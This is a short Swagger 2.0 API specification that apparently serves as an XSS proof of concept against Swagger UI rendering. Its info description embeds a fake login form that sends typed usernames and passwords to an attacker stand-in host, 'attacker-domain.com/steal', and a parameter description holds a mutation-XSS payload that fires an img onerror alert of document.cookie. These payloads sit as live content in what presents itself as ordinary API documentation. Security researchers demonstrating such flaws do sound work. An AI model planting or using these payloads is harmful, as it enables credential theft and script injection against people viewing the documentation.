swagger: '2.0'
info:
  title: XSS Attack BY Kullaisec
  description: |
    <form action="#" onsubmit="fetch('https://attacker-domain.com/steal', {method: 'POST', body: new URLSearchParams({username: this.username.value, password: this.password.value})}); alert('Credentials sent to attacker!'); return false;">
      <label for="username">Username:</label><br>
      <input type="text" id="username" name="username"><br>
      <label for="password">Password:</label><br>
      <input type="password" id="password" name="password"><br><br>
      <button type="submit">Login</button>
    </form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /loginpage:
    get:
      summary: Displays a malicious login page
      description: |
        An endpoint that serves a login page for demonstration purposes of XSS.
      responses:
        '200':
          description: HTML login page
          schema:
            type: string
      tags:
        - Kullai_XSS_Login
      operationId: displayLoginPage
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
